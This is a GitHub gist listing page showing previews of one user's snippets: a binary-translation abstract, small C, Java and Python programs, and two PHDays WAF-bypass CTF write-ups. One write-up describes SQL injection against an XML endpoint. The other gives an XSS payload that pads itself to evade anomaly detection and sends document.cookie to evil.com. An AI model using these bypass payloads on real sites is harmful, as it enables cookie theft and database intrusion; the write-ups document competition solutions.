Skip to content

Instantly share code, notes, and snippets.

ngo

Block or report user

Report or block ngo

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View gist:ec83d04d04b676d8220266dbb25783bd
Были реализованы два подхода к построению системы двоичной транс-ляции. При первом из них она работает между микропроцессором и за-пускаемыми на нем x86-кодами, транслируя коды BIOS, операционной системы, драйверов и прикладных программ. Вычислительный комплекс на базе микропроцессора «Эльбрус» с системой полной двоичной транс-ляции для пользователя неотличим от вычислительного комплекса на базе x86-микропроцессоров. При втором подходе эта система является обычным Linux-приложением и работает под управлением ОС Linux. Она позволяет запускать Linux-приложения для платформы x86, которые могут работать одновременно с приложениями в кодах платформы «Эльбрус»
Two approaches for building a binary translation system were implemented. In the first approach the system works between CPU and the x86 instructions that are being executed, translating the instructions of BIOS, OS, drivers and applications. For a user, the Elbrus-based appliance with full binary translation is indistinguishable from an x86 appliance. In t
View 1.c
#include <pthread.h>
#include <stdio.h>
#include <unistd.h>
#define NUM_THREADS 5
void *PrintHello(void *threadid)
{
long tid;
tid = (long)threadid;
if (tid == 0){
@ngo
ngo / Main.java
Last active Jun 20, 2018
SAX sucks
View Main.java
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.net.MalformedURLException;
import java.net.URL;
import java.net.URLClassLoader;
public class Main {
public static void main(String[] args) {
try {
@ngo
ngo / Main.java
Created Jun 19, 2018
Dynamic loading of jython jars and classloader problems
View Main.java
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.net.MalformedURLException;
import java.net.URL;
import java.net.URLClassLoader;
public class Main {
public static void main(String[] args) {
try {
View command_f3a628a4-ace0-4934-a7c1-ff7e6882e3d0.php
<?php
srand(time());
class DomainFramer2
{
private $_path_cands = Array();
private $_path_cands2 = Array();
private $_cscript_payload = "";
private $_current_cscript_path = "";
View solve.py
#!/usr/bin/env python
import math
from collections import defaultdict
import sys
def factors(n):
result = []
for i in range(2,n+1): # test all integers between 2 and n
s = 0
while n/i == math.floor(n/float(i)): # is n/i an integer?
n = n/float(i)
@ngo
ngo / XSD
Last active Sep 3, 2015
PhDays 2015 WAF bypass challenge
View XSD
There was an XSD challenge, which nobody, as far as I know, solved in an intended way. We weren't quite sure that this was xsd, and found SQLi first.
The vulnerable interface was parsing XML from POST requests to /tickets.php and its id parameter was vulnerable to sqli. We quickly understood that the WAF enforced the parameter length to be exactly 35 chars long, which was a nuisance. Fortunately, we found that changing host to foo.waf-bypass.com (from the intended choo-choo.waf-bypass.com) removed that restriction. All that was left was to bypass the syntax anomaly detection, which was quite easy. The final vector is as follows (db was postgres, so this uses a relatively new error-based box() vector with xml functions to quickly get all database):
POST /tickets.php HTTP/1.1
Host: hui.phdays.com
Content-Type: text/xml
X-Requested-With: XMLHttpRequest
Referer: http://choo-choo.phdays.com/index.php?search=%27%22%3E
Content-Length: 174
Cookie: WAFBYPASS=5727e690-39f4-44f1-a271-c6edfc1b4336
Connection: keep-alive
View http_test.py
from http_parser.parser import HttpParser as HttpParserC
from http_parser.pyparser import HttpParser as HttpParserPy
REQUEST = 'GET /hjs?m_mode=multipart&site=news&region=US&lang=en-US&pagetype=contentb&&__r=1391585859471&post=%7B%22reqs%22%3A%5B%7B%22handler%22%3A%22cfg.maple_dali.handler.refresh%22%2C%22data%22%3A%7B%22maple%22%3A%7B%22module%22%3A%22p_30345826%22%2C%22ba%22%3A%7B%22_txnid%22%3A0%2C%22_mode%22%3A%22json%22%2C%22_id%22%3A%22p_30345826%22%2C%22_container%22%3A0%2C%22_action%22%3A%22show%22%2C%22_subAction%22%3A%22getButtons%22%2C%22noups%22%3A1%2C%22sec%22%3A%22td-strm-dr%22%2C%22layout%22%3A%22horizontal%22%2C%22title%22%3A%22Sign-in%20and%20we%27ll%20show%20you%20more%20like%20this%20in%20the%20future.%22%2C%22narrow%22%3A1%7D%7D%7D%2C%22txId%22%3A1%7D%5D%2C%22props%22%3A%7B%22dali%22%3A%7B%22crumb%22%3A%22q%2FSc0Cy2vZm%22%2C%22yuid%22%3A%22%22%2C%22loggedIn%22%3A%220%22%2C%22mLogin%22%3A0%7D%7D%7D HTTP/1.1\r\nHost: news.yahoo.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:26.0) Gec
@ngo
ngo / Anomaly
Last active Sep 14, 2017
PHDays Waf Bypass
View Anomaly
In this task we had to bypass a badly-trained anomaly detection algorithm and perform an XSS attack.
We didn't have to figure out exactly how the anomaly detection worked, but as soon as we understood that the anomaly scoring was based on the density of the "bad" (i.e. non-alphanumeric) chars in the payload. Thus, the solution was to dissolve the attack payload in a lot of benign symbols ([AxN] represents a string of N A's):
anomaly.php?name=[Ax600]%3Cvideo+[Ax300]+src=//evil.com+[Ax300]+onerror=src%2b=document.cookie+[Ax1000]+/>
You can’t perform that action at this time.